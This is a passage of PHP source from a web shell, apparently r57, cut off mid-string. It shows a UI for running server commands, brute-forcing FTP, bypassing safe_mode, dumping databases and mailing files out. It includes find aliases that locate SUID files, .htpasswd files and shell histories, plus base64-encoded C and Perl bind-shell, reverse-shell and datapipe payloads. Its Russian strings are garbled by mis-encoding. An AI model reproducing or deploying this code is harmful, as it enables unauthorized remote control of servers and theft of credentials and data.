ôàéëàُ ٌ ïîىîùü‏ ٍَèëèٍû find', +'ru_text77'=>'دًîٌىîًٍ ًٌٍَêًٍَû لàçû نàييûُ', +'ru_text78'=>'دîêàçûâàٍü ٍàلëèِû', +'ru_text79'=>'دîêàçûâàٍü ٌٍîëلِû', +'ru_text80'=>'زèï', +'ru_text81'=>'رهٍü', +'ru_text82'=>'ءàçû نàييûُ', +'ru_text83'=>'آûïîëيهيèه SQL çàïًîٌà', +'ru_text84'=>'SQL çàïًîٌ', +'ru_text85'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé safe_mode ÷هًهç âûïîëيهيèه êîىàين â MSSQL ٌهًâهًه', +'ru_text86'=>'رêà÷èâàيèه ôàéëà ٌ ٌهًâهًà', +'ru_butt14'=>'رêà÷àٍü', +'ru_text87'=>'اàمًَçêà ôàéëîâ ٌ َنàëهييîمî ftp-ٌهًâهًà', +'ru_text88'=>'FTP-ٌهًâهً:ïîًٍ', +'ru_text89'=>'شàéë يà ftp ٌهًâهًه', +'ru_text90'=>'ذهوèى 
ïهًهنà÷è', +'ru_text91'=>'ہًُèâèًîâàٍü â', +'ru_text92'=>'لهç àًُèâàِèè', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-لًٍَôîًٌ', +'ru_text95'=>'رïèٌîê ïîëüçîâàٍهëهé', +'ru_text96'=>'حه َنàëîٌü ïîëَ÷èٍü ٌïèٌîê ïîëüçîâàٍهëهé', +'ru_text97'=>'دًîâهًهيî êîىلèيàِèé: ', +'ru_text98'=>'سنà÷يûُ ïîنêë‏÷هيèé: ', +'ru_text99'=>'* â êà÷هٌٍâه ëîمèيà è ïàًîëے èٌïîëüçَهٌٍے èىے ïîëüçîâàٍهëے èç /etc/passwd', +'ru_text100'=>'خٍïًàâêà ôàéëîâ يà َنàëهييûé ôٍï ٌهًâهً', +'ru_text101'=>'بٌïîëüçîâàٍü ٍàêوه ïهًهâهًيٍَîه (user -> resu) èىے ïîëüçîâàٍهëے â êà÷هٌٍâه ïàًîëے', +'ru_text102'=>'دî÷ٍà', +'ru_text103'=>'خٍïًàâêà ïèٌüىà', +'ru_text104'=>'خٍïًàâêà ôàéëà يà ïî÷ٍîâûé ےùèê', +'ru_text105'=>'تîىَ', +'ru_text106'=>'خٍ', +'ru_text107'=>'زهىà', +'ru_butt15'=>'خٍïًàâèٍü', +'ru_text108'=>'زهêٌٍ ïèٌüىà', +'ru_text109'=>'رâهًيٍَü', +'ru_text110'=>'ذàçâهًيٍَü', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not 
found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', 
+'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +); +/* +ہëèàٌû êîىàين +دîçâîëے‏ٍ èçلهوàٍü ىيîمîêًàٍيîمî يàلîًà îنيèُ è ٍهُ-وه êîىàين. ( رنهëàيî لëàمîنàًے ىîهé ïًèًîنيîé ëهيè ) +آû ىîوهٍه ٌàىè نîلàâëےٍü èëè èçىهيےٍü êîىàينû. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . 
-type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . 
-type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>è</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + 
$res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ 
+if($GLOBALS['language']=="ru"){ $text = 'خّèلêà! حه ىîمَ çàïèٌàٍü â ôàéë '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'خّèلêà! حه ىîمَ ïًî÷èٍàٍü ôàéë '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "حه َنàëîٌü ٌîçنàٍü "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('حه َنàëîٌü ïîنêë‏÷èٍüٌے ê ftp ٌهًâهًَ','خّèلêà àâٍîًèçàِèè يà ftp ٌهًâهًه','حه َنàëîٌü ïîىهيےٍü نèًهêٍîًè‏ يà ftp ٌهًâهًه'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('حه َنàëîٌü îٍïًàâèٍü ïèٌüىî','دèٌüىî îٍïًàâëهيî'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 
0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." 
"; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + 
function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj 
